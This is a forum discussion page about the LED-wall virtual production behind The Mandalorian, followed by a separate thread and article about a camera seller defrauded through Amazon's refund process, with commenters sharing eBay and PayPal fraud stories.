TECH SPECS2.39:1 Anamorphic Digital Capture Arri Alexa LF LF Open Gate, ArriRaw, 4.5K Panavision Ultra Vista, 1.65x squeeze




All Comments: [-] | anchor

asmosoinio(3257) 4 days ago [-]

Why is this one person always referred to with 'ASC, ACS' after their name?

> Greig Fraser, ASC, ACS

numpad0(10000) 4 days ago [-]

I believe many unions of film-making workers demands its members' names to be always followed by the group's names zero exceptions, to protect itself and their rights.

Show businesses was/is one of industries that unions worked.

emmsii(10000) 4 days ago [-]

It means they are a member of the American Society of Cinematographers (ASC) and I believe the Australian Cinematographers Society (ACS).

severak_cz(10000) 4 days ago [-]

Funny that this is practically the same concept as shooting in atelier with exterior background painted on walls as it was done in old movies. The progress is only in technology - now it's created by game engine and projected to giant LEDs, back then in 1930s it was done by hand by painters.

estebank(10000) 4 days ago [-]

I think the innovation is the perspective correction of the background depending on the camera. That could have been accomplished with rear projection in film if it had been necessary by having the camera follow a preset path, but I don't think even BTTF attempted that.

pupdogg(10000) 5 days ago [-]

The highest resolution LED panel pixel pitch I've seen to date is 0.7mm...wouldn't this result in a lower resolution capture of the projected background? Specifically, when they're trying to shoot movies at or above 4K range? Also, how do they cope with the scan rate of the background video being played back to sync with the camera recording the footage?

jxy(4169) 5 days ago [-]

Depending on your viewing distance, the pixel pitch of 2.84mm is practically a retina display if you look at it 10m away.

thegoleffect(4264) 5 days ago [-]

In some photos, you can see that from the camera's POV, the area around the actors is displayed on LED as green screen so the actors can be masked out. Then, a higher resolution background is composited in. Thus, the original LED serves to accurately light the scene to reflect the background but not always to actually be the background.

snowwrestler(4200) 4 days ago [-]

One of the details from the article is that using anamorphic lenses essentially treats the camera sensor as if it is larger than it actually is, which reduces the effective depth of field.

If you look carefully at the backgrounds in Mandalorian scenes, a lot of the time, they are slightly soft (out of focus)--which hides the pitch of the LED wall by expanding each LED point into larger, overlapping circles of confusion. To be clear, that softness is a physical effect of the camera lens, not a digital effect on the wall, so it can be captured by the camera sensor up to any resolution you want.

> Also, how do they cope with the scan rate of the background video being played back to sync with the camera recording the footage?

In the article they say the latency is about half a frame, which they handled by using slow camera moves--which conveniently is similar to how the original Star Wars films were shot.

If you're talking about the refresh rate of the LEDs, I believe those can be cranked up way higher than the frame rate of the camera, which was likely 24 or maybe 30 frames per second to give that cinematic feel.

devindotcom(4030) 5 days ago [-]

This is super interesting stuff and I've been following it for some time. I just wrote it up with a bit more context:

https://techcrunch.com/2020/02/20/how-the-mandalorian-and-il...

It's not just ILM and Disney either, this is going to be everywhere. It's complex to set up and run in some ways but the benefits are enormous for pretty much everyone involved. I doubt there will be a major TV or film production that doesn't use LED walls 5 years from now.

dd36(4145) 5 days ago [-]

I wonder how much this reduces the environmental footprint. The explosion in shows and movies always looking for raw nature or awesome settings has me wondering how much destruction it makes. And how much waste it produces.

tobr(1728) 4 days ago [-]

Is there any way to read your article if I can't figure out how to navigate through the legalese and dark patterns of Verizon's privacy extortion wall?

treblig(3350) 5 days ago [-]

'Postproduction was mostly refining creative choices that we were not able to finalize on the set in a way that we deemed photo-real.'

Does anyone know how they were able to swap out the in-camera version of the background originally shown on the LED wall with something more convincing later? Seems like it'd be tough since it's not a green screen!

janekm(10000) 4 days ago [-]

While currently they are using 'green screen' in those instances, given that the camera positions are already being tracked, and the image displayed on the screens is known, it would be possible to re-render what image the camera should have seen if the foreground elements hadn't been present and use the difference with the recorded image as a mask for further post-processing.

(which would be very cool as it would also allow using a low-resolution version of the background during production that could then be re-rendered with a higher resolution image after the fact)

czr(10000) 5 days ago [-]

iirc they project small green region around the actors and real props, so that ambient light and reflections are still mostly correct but they can also get clean matte out.

web-cowboy(10000) 5 days ago [-]

So we'll be able to play video game adaptations of the locations in the episodes really easily/soon, right? ;)

cgrealy(10000) 5 days ago [-]

I'd say it wouldn't help much. You're building one small scene that's designed to be viewed from a relatively small area or path. I highly doubt they're building anything that doesn't appear on screen. If you were to walk about that scene in Unreal... I'd imagine it's the digital equivalent of a fake old west town.

ghostbrainalpha(10000) 5 days ago [-]

That has to be a consideration. But I don't know how much it would really speed up production of a AAA Mandalorian game. Some... maybe a 6 month head start on a 4-5 year game.

It would definitely help make the game environments higher quality and be a cost saving to the studio.

petermcneeley(4203) 5 days ago [-]

This technique will produce potentially significant rendering artifacts in the final image. The backdrop is correct only from the position of the camera. A reflection from any surface will not be geometrically correct (as seen by the image from the article) I think that even ambient lighting would contain noticable deformations.

virtualritz(4070) 5 days ago [-]

It's much better than the reflection of a green/blue screen or an empty studio with some cameras and people.

Glossy surfaces are usually not a problem unless they're (near) perfect mirrors. Even then -- lights are usually what you see in most reflections because they're orders of magnitude brighter than the rest of the set.

If reflections are problem with this new technique in certain settings, they would be even more with the current state of the art.

In those cases you replace them digitally. No way around this; either way.

Related trivia: The chrome starships in EP1 were actually rendered with environment mapping and reflection occlusion[1]. Even most games do better stuff today. Did you notice? :]

[1] http://www.spherevfx.com/downloads/ProductionReadyGI.pdf 5.3 Reflection Occlusion, pp. 89

vsareto(4223) 5 days ago [-]

Can you get a decent job just by knowing Unreal Engine well? Maybe by just doing small POC projects?

vernie(10000) 5 days ago [-]

Libreri and Sweeney are trying their damnedest to make that true.

mattigames(3961) 4 days ago [-]

If by 'well' you mean including Blueprints and physics-based-shaders then probably yes; although stuff like 3D rigging and modeling which is done on different third-party tools are a must for a lot related jobs.

rebuilder(10000) 5 days ago [-]

The Mandalorian was probably a very likely candidate for this kind of approach, since it's essentially a western, meaning a lot of wide landscape shots.

The LED screen approach works nicely for fairly uncomplicated background geometry, like a plain. Try shooting Spiderman climbing up walls on that, and things will get tricky fast.

As the article notes, slow camera moves are a plus as well. The reason given is technical, but I also wonder how far you could really push the camera motion even if tracking lag wasn't an issue. The background is calculated to match the camera's viewpoint, so I expect it would be very disorienting for the actors if the camera was moving at high speeds.

wbl(4034) 5 days ago [-]

Spiderman climbing up a wall can be done via forced perspective. It's also an action scene, reducing the need for a background to help the actor. And some brave souls will Harold Lloyd it.

cbhl(3478) 5 days ago [-]

'The solution was ... a dynamic, real-time, photo-real background played back on a massive LED video wall and ceiling ... rendered with correct camera positional data.'

Gee, that sounds a lot like a holodeck. We've come a long way from using Wii Sensor Bars[0] for position tracking.

[0] https://www.youtube.com/watch?v=LC_KKxAuLQw

modeless(1461) 5 days ago [-]

The 'holodeck' version of this is called a CAVE and the first one was built in 1992: https://www.youtube.com/watch?v=aKL0urEdtPU https://en.wikipedia.org/wiki/Cave_automatic_virtual_environ...

overcast(4273) 5 days ago [-]

Speaking of the Wii, does anyone else wish that motion controls could just be removed from its existing library? Not only has it just a major annoyance in most games, but its basically locked into that hardware now.

ragebol(4315) 5 days ago [-]

For the VFX industry, the tracking had already been solved for ages, with those reflective little balls on suits etc. in a mocap system. The Wii sensor bar's thing was that it was really cheap.

But yes, damn close to a holodeck. But you can't see depth in this setup, right?

flashman(3837) 5 days ago [-]

I wonder how the photogrammetry aspect will intersect with intellectual property laws. The example used - scanning in a Santa Monica bar so that you can do reshoots without revisiting the location - would be an obvious example that might raise someone's hackles ('because it's our bar you're using to make your money' for instance). If you add that bar to your digital library, do you have to pay them royalties each time you use it? Is it any different to constructing a practical replica of a real-life location?

Can someone wearing a few cameras walk through a building and digitise it completely without getting the owner's permission? Here in Australia, 'copyright in a building or a model of a building is not infringed by the making of a painting, drawing, engraving or photograph of the building or model or by the inclusion of the building or model in a cinematograph film or in a television broadcast,' for instance. (Copyright Act 1968 §66)

kragen(10000) 5 days ago [-]

If you have to pay royalties, they won't be to the bar; they'll be to the bar's architect. Copyright law generally only covers expressive, rather than functional, aspects of a copyrighted work, so things like doors and walls might be okay, but architectural design is recognized as copyrightable.

In general I strongly recommend avoiding the term 'intellectual property' because it conflates several different areas of law with almost totally unrelated traditions, statutes, and (in common-law countries) precedents — copyrights, patents, design patents, mask works, trademarks, trade secrets, and most alarmingly, in the EU, database rights. (Moreover, it's an extremely loaded term, like 'pro-life' and 'pro-choice'.)

BubRoss(10000) 4 days ago [-]

When shooting at a location, the owner is payed a location fee. Detailed and specialized photography has been used at locations for decades at this point. This is a refinement of what is already happening, not something completely new.

paulmd(3834) 5 days ago [-]

A potential analogy might be something like using Carrie Fisher's image in the new Star Wars movies. I would assume the estate got paid for that. Or holo-tupac.

Practically speaking I think it will come down to what you negotiate. If you negotiate usage of the bar for your series then you can use it, otherwise not. If you negotiate resale of that model then that's legal, otherwise not. Most large productions will probably want to stay far on the right side of the law and get a written/financial agreement until things are hammered out, then you'll have amateur filmmakers who have to do vigilante shoots.

And again, probably something that will have to be legislated out for the long term.

In France, the appearance of buildings can be copyrighted, famously the Eiffel Tower is very aggressive about suing photographers.

lmilcin(4307) 5 days ago [-]

I don't care how 'groundbreaking' the graphics pipeline. I watched couple of episodes and I had to force myself to keep watching to, I don't know, give it a chance?

I wonder when The Industry figures out the story is more important than the graphics. You don't buy books for beautiful cover and typesetting... at least not most you and not most of the time.

anigbrowl(67) 5 days ago [-]

I enjoyed the story and apparently many other people did too. It's fanservice for sure, hence all the callbacks to characters and aliens that had background or very brief appearances in the original movies and left people wanting more. Cheesy, perhaps, but the entire franchise is pineapple pizza in space.

cgrealy(10000) 5 days ago [-]

Whether or not you liked the story is utterly irrelevant to the article.

en4bz(10000) 5 days ago [-]

I think the demise of Lytro was a huge missed opportunity for the film industry. They had this and a number of other features in their cinema camera before they became defunct a few years ago.

https://www.youtube.com/watch?v=4qXE4sA-hLQ

anchpop(3692) 5 days ago [-]

I watched that video, it doesn't really seem like the same thing in this article (although it's very cool). This is a real screen behind the actors rendering the scene from the perspective of the camera

mdorazio(10000) 5 days ago [-]

For those wondering, this appears to be not nearly as expensive as I thought. The 20' square panels used are available for around $1000 each if you buy a lot of them used. Compared to a typical production budget for a high-quality franchise, it's surprisingly cheap to build one of these walls. The equipment to run it, on the other hand, is likely not cheap at all.

ishtanbul(4315) 4 days ago [-]

If the mandolorian was filmed entirely on location with vfx in post it would have cost hundreds and hundreds of millions. The sets were incredibly detailed. So i think they saved a ton of money for the output quality. I also doubt they bought second hand gear.

oseibonsu(3224) 5 days ago [-]

Here is the Unreal Engine tech they are using: https://www.unrealengine.com/en-US/spotlights/unreal-engine-... . This is a video of it in action: https://www.youtube.com/watch?v=bErPsq5kPzE&feature=emb_logo .

KineticLensman(10000) 5 days ago [-]

Unreal Engine is also used by the BBC to create virtual studios for football punditry programmes. This uses a simpler green screen technology, but it demonstrates how Epic are moving away from their gaming roots.

jahlove(10000) 5 days ago [-]

Here's a video of it in action on The Mandalorian set:

https://www.youtube.com/watch?v=gUnxzVOs3rk

foota(4261) 5 days ago [-]

That's really cool!

tigershark(10000) 5 days ago [-]

Please send me a link of someone that watched the original Star Wars, the later trilogy and finally the last "attempt" and really appreciated it. I even watched "Rogue One" in the biggest screen available around me, with high expectations, and I'm feeling really sad because of that.

vidarh(4286) 4 days ago [-]

I've seen all of them, and loved all of them.

To me, most of the criticism feels like it comes from people who have had time to rationalize the old plots and settings, but who see the new ones with a more jaded mind or a set idea of what they 'should' be like instead of approaching them with an open mind. They have flaws, but so does the original trilogy.

Star Wars from the beginning were silly westerns set in space with all kinds of ridiculous aliens thrown in. Taking them too seriously and applying that as a constraint on the following trilogies would never end well.

When people complained about Jar Jar, for example, all I could think about was how people could take issue with Jar Jar but take no issue with Chewbacca, or the ewoks, or R2D2 and C3PO. They're also incredibly cheesy in other ways in a way that was common in the 80's, but that is really dated today (e.g. the Ewok celebration scene).

I think seeing e.g. Spaceballs is a good way of having it driven home how just how ridiculous Star Wars really is and looked at the time if you don't let yourself be immersed in it. Spaceballs crosses the line from 'serious' space opera to comedy very clearly, but it to me it also illustrates just how ridiculous lengths they had to go to in order to clearly be a send-up instead of a cheap Star Wars knockoff. They'd not had to cut that many jokes and toned back that many things before it'd have seemed like an attempt at being serious.

Star Wars is fun in part because it manages to 'sell' a setting that is on the face of it so crazy and not taking itself too seriously. But it seems a lot of the fans of the original trilogy bought into that and then decided to take it all very seriously instead of seeing them as light adventure movies and 'space westerns'.

The challenge is also in no large part a question of changing tastes in other ways as well - my son finds the original trilogy horribly slow moving to the point of boredom, for example, and I can understand that. Tastes have changed. Pacing has changed. Composition and cinematography has changed. But that also means that the modern trilogies had to be very different or fall flat with younger audiences in ways that would always annoy the die hard fans; they're trying to reflect how we remember them more than how they are, but different people remember them in different ways.

[I tend to treat criticism of the last Indiana Jones in much the same way; people venerate the original movies, but they were extremely cheesy and contrived, involving literal deus ex machina, but surviving a test explosion in a fridge and interdimensional aliens is suddenly over the top]

As for Rogue One, to me it's one of the most enjoyable movies of the franchise. In no small part because they were allowed to explore the setting with much more freedom (ok to let characters more central to the plot die for example).

UI_at_80x24(10000) 5 days ago [-]

I watched the original trilogy in the theaters when they were released. (Admittedly I was a bit young for the first one.)

I've seen all the follow-ups/addons/sequels/rewrites that exist. Rogue One is the movie that I waited 30 years to see another story in the SW universe. It wasn't perfect but it was damn good enough.

The Mandalorian gives me hope that 'Grownups' are in charge and can create something worth looking at.

I am holding out hope that a story and plot will emerge. I really hate 'baby yoda', but if that's what it takes to move a real story along I am willing to tolerate it.

#1 It looks incredible. Must win Emmy for best cinematography! #2 It feels real. It feels right.

I'm sorry you didn't like Rogue One.

aurizon(10000) 4 days ago [-]

I am over 80, I have watched them all, and enjoyed them all. What few criticisms I had were lost in the overall enjoyment of all that good work. What we do now makes those early shows look crude - which they are by modern standards, but in the day OOOOHHH, AAAHHHH. I still recall the first Star Wars crawl and it makes me shiver - I guess that's why they still use it...

jpmattia(4273) 4 days ago [-]

I've had a peripheral interest in virtual sets and real-time compositing by way of a colleague from grad school.

A quick visual summary of this tech: http://www.lightcrafttech.com/portfolio/beauty-beast/

This video was from a pilot several years ago, and it didn't make it to air, but it was visually wonderful.

russellbeattie(10000) 4 days ago [-]

With F. Murray Abraham as well! Nice. He's looked the same since 1984's Amadeus. Crazy!

mitchelhall(10000) 5 days ago [-]

Hi all, really cool that you have taken an interest in this project, a lot of your comments below are very insightful and interesting. I work on the team that deploys this tech on set. We focus on how the video signals get from the video output servers to the LED surfaces, coordinating how we deal with tracking methods, photogrammetry, signal delivery, operator controls and the infrastructure that supports all of this. As noted in some of the comments, the VFX industry solved tracking with mocap suits a long time ago for the post-production process. What we are exploring now is how we can leverage new technology, hardware, and workflows to move some of the post-production processes into the pre-production and production (main/secondary unit photography) stages.

If you are interested in checking out another LED volume setup, my team also worked on First Man last year. This clip shows a little more of how we assemble these LED surfaces as well as a bit of how we use custom integrations to interface with mechanical automation systems. [https://vimeo.com/309382367]

m3at(4147) 4 days ago [-]

Great work! It must be a tremendously interesting job.

You might be able to answer my question which is: why use exclusively LED and no projector? I imagine that it's mainly because it's too dim and the main goal is to get good reflections. Is that something that was considered?

(I'm wondering as I found the work of teamLab very impressive, which rely heavily on projectors: https://www.teamlab.art/)

devindotcom(4030) 4 days ago [-]

Would love to talk to you! Are you at ILM or a partner like Fuse or ROE? You can contact me at devin at techcrunch dot com, I'm working on more pieces on this tech.

werber(3304) 4 days ago [-]

That article is mindblowing, how do the tech side and the creative side work together on this kind of a project? How much does the technology shape the story telling?

kragen(10000) 5 days ago [-]

Thanks! This work is really inspiring! Are these OLED screens, matrices of separate LEDs of the usual InGaAs and GaN type, or LCDs backlit with LEDs? The 2.84 mm pixel pitch makes it sound like it's separate inorganic LEDs.

Are there times short of sunshine where you need more directionality to the lighting than the screens can provide? Because the screens can emit from any direction but not toward any direction, being quasi-Lambertian emitters.





Historical Discussions: Amazon let a fraudster keep my Sony A74 IV and refunded him (February 21, 2020: 726 points)

(729) Amazon let a fraudster keep my Sony A74 IV and refunded him

729 points 4 days ago by ProAm in 1490th position

petapixel.com | Estimated reading time – 5 minutes | comments | anchor

I am an amateur photographer, and I've sold cameras non-professionally on Amazon for over eight years as I've upgraded. That trend comes to an end with my most recent transaction. In December, I sold a mint-in-box Sony a7R 4, and the buyer used a combination of social engineering and ambiguity to not only end up with the camera, but also the money he paid me.

Amazon's A-to-Z Guarantee did not protect me as a seller. Based on my experience with this transaction, I cannot in good faith recommend selling cameras on Amazon anymore.


Author's Note: This is a summary and my personal opinion, and not that of my employer or anyone else.


Here's what happened.

I ordered a second Sony a7R 4 as a backup for a photoshoot. My plan was to then resell it, as the seller fees were slightly less than the rental fees at the time. I listed it on Amazon, and it was almost instantly purchased by a buyer from Florida. I took photos of the camera as I prepared it for shipment, and used confirmed & insured two-day FedEx. The package arrived to the buyer on December 17th.

The buyer listed an initial for his last name—that should have been a red flag. It gave him a layer of anonymity that will be relevant later.

On December 24th, I apparently ruined Christmas, as the buyer now claims that accessories were missing. Throughout this whole ordeal, I've never heard directly from the buyer, in spite of numerous email communications. He never told me which "product purchased/packaging" was missing.

I started a claim with Amazon, showing the photographic evidence of a mint-in-box a7R 4 with all accessories. I denied the return. The buyer offered no photographic proof or other evidence that he received anything but a mint camera.

To this day, I have no idea what he claimed was "missing" from the package. I even included all the original plastic wrap!

After about a week of back-and-forth emails, Amazon initially agreed with me.

Somehow, a second support ticket for the same item got opened up. The issue was not yet resolved. The buyer kept clawing back. The next day, I get an email about a "refund request initiated." On this second ticket, Amazon now turned against me.

Now, we're in 2020. The buyer apparently shipped the camera back to me; however, he entered the wrong address (forgetting my last name, among other things). The package was returned to sender, and I never got to inspect what's inside. Whether that box contained the camera as sent in like new condition, a used camera, or a box of stones is an eternal mystery.

Truly, had he shipped it to the right address, I would have had multiple witnesses and video footage of the unboxing.

Here's where it gets interesting: as I appeal the claim, Amazon notes that the buyer is not responsible for shipping the item back to the correct address, and they can indeed keep the item if they want to, following the initiation of an A-to-Z Guarantee.

Indeed, I have a paper trail of emails that I in fact sent to Amazon. Somehow, they got their tickets confused. When I followed up on this email, they shut off communication.

So, as a buyer, you can keep an item with "no obligation to return," even if you can't substantiate your claim of "missing items or box." Now the buyer has the camera, and the cash.

The whole experience has been frustrating, humiliating, and sickening to my photography hobby. I hope that this serves as a cautionary tale for selling such goods on Amazon, if my experience is any indication.

As of now, I've emailed the buyer again to ship the camera back to me, and I have a case open with Amazon, in which I provide the 23 emails they claim I never sent them. That case was closed with no response from Amazon. I had an initially-sympathetic ear through their Twitter support, until I mentioned the specifics of my case.

Recommendations

  • If you're going to sell on Amazon or elsewhere, take an actual video of you packing the camera. You need all the defense you can get against items mysteriously disappearing.
  • Investigate more even-handed selling services, like eBay, Fred Miranda, or other online retailers.
  • If you need a backup camera, go ahead and rent one. I'm a frequent customer of BorrowLenses, and I infinitely regret not using them this time.
  • Update your personal articles insurance policy for any moment that the camera is in your possession, and use something like MyGearVault to keep track of all the serial numbers. I only had the camera for a couple of days altogether, but that was enough.

I hope that this was a worst-case, everything-goes-wrong scenario, and I hope that it doesn't happen to anyone else. There ought to be more even-handed failsafes for these transactions.


About the author: Cliff is an amateur landscape and travel photographer. You can find more of his work on his website and Instagram account.




All Comments: [-] | anchor

canada_dry(4164) 4 days ago [-]

This is such a basic issue that I don't understand why USPS or some other shipper w/ bricks-n-mortar haven't stepped up to offer some sort of package shipping certification.

If I was the seller it could work as simply as me bringing the item to a shipper who would take their own photos and weigh the items being packaged up as well as some check that the item is as being described to the recipient. In turn the shipper would get an extra fee.

For high value items (i.e. like OP's camera) it would certainly be in everyone's best interest and platforms like ebay, Facebook, Amazon could insist that all parties use this type of service or relinquish their ability to dispute.

Too over simplified??

bonestamp2(10000) 4 days ago [-]

Sounds reasonable and it could be fairly automated too. You can already take amazon returns to UPS stores, Whole Foods or Kohls and they will box it for you. All they need is a camera system to video the boxing and then associate the shipping label/tracking number with that video.

The boxing video could be made available on the courier's site for any interested party to see (when enabled by the shipper). Sure, it may not capture the quality of an item, but that's a fairly small detail that can be resolved with a return/partial refund and it would at least put an end to the rampant fraud that goes on.

bufferoverflow(3706) 3 days ago [-]

You can still fool that system by shipping a broken camera. USPS won't be checking the functionality.

dharmab(10000) 4 days ago [-]

Isn't this a form of escrow service? Those are sometimes used when buying very expensive items via auction/real world.

sas41(10000) 3 days ago [-]

This is exactly how it works in Bulgaria, most second hand marketplaces use a courier who offers the following process:

You describe what you are shipping, how much you want for it and who covers the shipping costs.

The buyer will go to the courier office and inspect the item, if they agree to buy it, they sign off on it, pay the price + shipping (if they are the one who's supposed to pay for shipping) and the seller can get their cash from an office near them the next day.

Important bit is, the buyer inspects the item and signs on it, if they buy it, if they refuse, they cannot keep the item.

dwnvoted2hell(10000) 3 days ago [-]

Once again, it could be the post office to the rescue, if only the post office decided to do a basic extension of the services they already offer.

However, even if this came to pass, you would still have a new requirement - that is to show the product exactly as it was originally sold. And for highly technical products there is absolutely no way to efficiently do this without hiring technicians for specific product types. Most products would need some kind of established rubric for how close to original condition they currently are, and nothing like this exists that I know of. The amount of money to process and run a system like this would require approximately 10-20% of the cost which is not unfeasible, but most people already balk at sales fees of 5%.

clSTophEjUdRanu(4315) 4 days ago [-]

There is already registered mail via USPS. The Hope Diamond was delivered to the Smithsonian via registered mail.

giarc(10000) 4 days ago [-]

At a Purolator (Canadian retailer) mailing centre near me, they have this system that weighs the box but also measures the dimensions. The whole rig is ceiling mounted (while the scale is on a counter). I suspect like this could also incorporate a camera that takes a photo of the inside contents.

tyingq(4263) 4 days ago [-]

'Screw the seller' is a proven winner for eBay, shipping services, credit card companies, etc. They are just following tradition.

CobrastanJorji(4320) 4 days ago [-]

You know, I'm surprised that those mailbox stores don't offer exactly this sort of service. Buyer and seller give a deposit to a postal store, the seller mails product to the store, the buyer inspects the product at the store and decides whether to keep it, and, if so, pays the balance to the store and walks out with the product, and presumably there could be a process for undoing it by returning the product to that same store later if a serious problem has emerged. I guess it's a lot of overhead for buying a video game or something, but it would make sense for $500+ transactions.

Those stores already have notaries, help with shipping, provide mailboxes, and the like. It'd fit pretty well into their wheelhouse.

S_A_P(4289) 4 days ago [-]

I sell quite a bit of vintage music gear on Reverb. I initially had some struggles with customers, but they seem to have mostly kept riff raff out. I think the fact that its still slightly a niche site keeps the volume down low enough to keep humans involved. As they were recently purchased by ETSY, Im wondering if this sort of service will start to drop off. Fingers crossed, Im selling a vintage Oberheim right now that I would be sick if a similar circumstance happened...

I stopped using ebay for the reason that most of the sellers just werent trustworthy enough. Amazon keeps trying to blur the line between marketplace and the company, which IMO is a bad move. I think they should run it in a similar manner than reverb, charge higher fees to pay for it(within reason) and actually do something to scammers on both sides of the transaction...

harikb(3684) 4 days ago [-]

There is a certain risk associated with buying used items. Even a item exchanged for cash via Craigslist can have issues - say a lens issue that only shows up in certain lighting. Too bad, we can't solve that.

However these platforms can solve anonymity - may be UPS can verify ID and address in addition to basic checks with item photo and weight. That is, make it equivalent to an in person exchange.

graylights(10000) 4 days ago [-]

Would that service be indemnifying the seller from fraud? Or is your assumption that the platform would just make the right call?

Probably it's because the platforms don't want to make services to root out fraud because then they become more responsible for owning it. Outside services can't break in because the platforms aren't going to put trust in them. Those services would have to own the cost of fraud.

kube-system(10000) 4 days ago [-]

> Too over simplified??

Probably. These shipping services don't really have any expertise to accurately judge the quality of many of the items they ship. They just move boxes around.

Some rando at FexEx Office doesn't really know how to determine that your DSLR has the advertised shutter count, nor do they know how to verify the SMART status of those hard drives you shipped, nor would they be able to validate the authenticity of your designer handbag.

There are specialized consignors popping up online that do have the ability to do these things, though.

tikiman163(10000) 4 days ago [-]

That's called the eskrow process. It's highly complicated, expensive and it requires the 3rd party is verifiable trustworthy because they effectively have all the power.

jrockway(3532) 4 days ago [-]

At least for camera equipment, this does exist. You can take your camera to B&H's used department, and they will buy it from you. You can also go to B&H's used department and buy a used camera from them.

The advantage of this over Amazon is that as a seller, you know B&H isn't going to screw you over in any way, and if they do, you know where to serve your lawsuit. A trusted business with a physical location is the counterparty in your transaction, which makes it pretty low risk. As a buyer, you know B&H is trustworthy and you can come back to the store and have a problem resolved.

Amazon offers nothing in a typical Amazon.com transaction beyond matching buyer and seller. They can't trust the buyer, and they can't trust the seller. So they can't really help with the transaction in any way, they are just there to take a cut for basically nothing. B&H takes a larger cut, but they actually do something.

Of course, people like money, so Amazon is rolling in it while most people don't even know that they can sell their camera to B&H. (I've bought used stuff from them because I don't trust random eBay listings, but never sold anything because the amount of money they offer wasn't worth it to me.)

kazinator(3922) 3 days ago [-]

Too over complicated.

https://en.wikipedia.org/wiki/Cash_on_delivery

COD is so old, it's the name of an AC!DC song. (Well, there it stands for 'care of the devil', never mind).

joshspankit(10000) 4 days ago [-]

There's one risk that seems to be being missed:

Fraud by delivery company staff. Someone might choose to risk their job for a verified $2k+ package. Moreso if they ended up with a truck full...

gnopgnip(10000) 4 days ago [-]

Fedex weighs packages at multiple stages and this is accessible for the shipper. I suspect USPS and UPS weigh packages at least once and this could be requested if there is a dispute. These don't do a lot to prevent fraud, and it would be difficult to provide authentication without specialized training. There are services that provide authentication with more expertise. StockX does it for new sneakers. The real real and a few others do it for luxury goods. Even with authentication by experts it is not 100% certain that you are getting authentic goods and there will be some dispute process. In practice few buyers would use a platform that completely blocks returns.

You could sell your camera to a company like KEH, and they take on nearly all of the seller side risk when dealing with consumers.

The real problem here is that Amazon is not following their own policies, and refunded the buyer when the buyer did not provide proof of delivery for the returned item, not anything else about the system in general. The recourse for that is small claims(or arbitration, but small claims is probably better for you, and it is allowed as an exception to the required arbitration)

sizzle(744) 4 days ago [-]

Isn't this how mortgage escrow essentially works?

sevenf0ur(10000) 4 days ago [-]

> If you're going to sell on Amazon or elsewhere, take an actual video of you packing the camera. You need all the defense you can get against items mysteriously disappearing.

Isn't this evidence just as bad as the buyer's account that he didn't receive any accessories? One could just unpack the box right after filming.

uberduber(10000) 4 days ago [-]

I do this on high value items. I pack the item in the car though for safety and film continuously until drop-off.

wtallis(4223) 4 days ago [-]

> Isn't this evidence just as bad as the buyer's account that he didn't receive any accessories?

No, of course not. Buyer didn't provide any details about what was missing or what was received. This isn't a level he-said/she-said, it's one party being forthcoming and the other evasive. Both parties had equal opportunity to lie, but only one put in effort to appear honest. Amazon should at least hold their scammers to a higher standard.

_underfl0w_(10000) 4 days ago [-]

I think this every time someone suggests filming part of the transaction. Nowhere does video of an action imply that it was not immediately undone right after filming.

dmitrygr(1849) 4 days ago [-]

pack in fedex store, film handing it over to store employee and keep filming until they scan the box in. their tracking will show them receiving box. at that point it is in their custody and you are not getting it back so you cannot re-open it.

abbot2(10000) 4 days ago [-]

I totally get the frustration and such, and not trying to protect Amazon, but: author's web site intercepting browser history to trigger 'checkout this content before you leave' when back navigation is clicked is outright evil. Just don't do that, be kind to visitors.

Edit:

1. Dictionary: evil, adj.: morally bad, cruel, or very unpleasant

2. To get the prompt you need to stay around on the page for a while, scroll around, pretend to read it. Triggers at least in mobile chrome browser.

draw_down(10000) 4 days ago [-]

Come on.

unreal37(3618) 4 days ago [-]

Let's have some perspective on what 'outright evil' really is.

You didn't get hurt by this.

bcrosby95(10000) 4 days ago [-]

I think your use of evil is about as evil as the pattern. Overblown rhetoric harms discourse.

Sohcahtoa82(10000) 4 days ago [-]

I did not get that prompt. I even tried disabling my ad blocker and did not get that prompt.

EDIT: Also, I think 'outright evil' is a bit strong. A dark pattern for sure, but not quite evil.

matsemann(10000) 4 days ago [-]

Not the first time Amazon is on blast here for expensive camera gear scams: I Fell Victim to a $1,500 Used Camera Lens Scam on Amazon [0]

[0]: https://news.ycombinator.com/item?id=14993216

CamelCaseName(4319) 4 days ago [-]

Unfortunately, there are plenty of categories that are absolute breeding grounds for scammers. Camera lenses is definitely one of them.

As a general rule, if the main differentiating feature of the product is hard to verify, or if the product is expensive and easy to resell, stay away.

ebaySucks123(10000) 4 days ago [-]

I had the same exact experience the last time I sold on ebay, in 2017. I sold an $800 item. One day before the claim window closed, the buyer filed a claim saying it had never arrived and claiming they emailed me several times and I never responded. I submitted proof of delivery from UPS and pointed out the simple fact that I had received no messages from the buyer through ebay messaging. Ebay gave them a full refund and refused to speak to me about it. When I called them and waited on hold for several hours, they literally just hung up on me. I closed my ebay and paypal accounts and I'll never use them again.

pdxbigman(10000) 4 days ago [-]

Stories like this are why I've never bought or sold anything on Ebay. They just seem like a genuinely shitty experience and I'd rather shell out extra cash to buy new or meet someone off craigslist as a bank.

JoshGlazebrook(2016) 4 days ago [-]

I have a similar story. I sold a brand new iPhone to someone on eBay who claimed it was reported as stolen and was not able to be used. Paypal refunded the buyer, and allowed them to keep the phone. Paypal account went negative, their internal collections started calling every day right away even though it was in dispute.

Even after providing proof that the IMEI was not reported as stolen, and them waiting weeks for the buyer to provide any proof (they didn't), they still sided with the buyer. I called for weeks, and finally after about two months, somehow the person on the phone was able to just issue a refund. I've not sold anything on Ebay since.

On top of that, when I had an issue with buying something through paypal, they used that ^ instance as a negative against me while on the phone. 'Well I see you sold a stolen iPhone in the past...' was not something I was expecting to hear.

amatecha(10000) 4 days ago [-]

Yeah, I've heard stuff like this for years and years and long ago decided I will never sell anything online. Craigslist in-person only.

filoleg(10000) 4 days ago [-]

EBay in 2017 was a giant shitshow (and probably still is, but I don't use it anymore). Both their security and support are complete trash, even if you happen to be lucky (like me) and they reply quickly.

I woke up one morning to get an email notification thanking me for purchasing a back bumper, a wing, and a few other parts for a 2012 Hyundai Genesis, which I obviously don't have and neither have I made that purchase. The fraudster even put their real delivery address and name less than 20 miles away from where I lived (which I reverse searched and confirmed that the name was associated with that address). I immediately notified eBay about this, they refunded me the purchase, and asked me to change my password. I did all that, removed the perp's address from the account, but eBay didn't have a legitimate 2FA solution, so I was kinda out of luck here.

Lo and behold, the day after, I wake up to info on my account (name+address) changed again. They couldn't change the email, as I have 2FA on my email account, but they did everything they could aside from that with my eBay account. This repeated at least one more time afterwards. By the end of this saga, I just gave up and closed my eBay account after getting my refund.

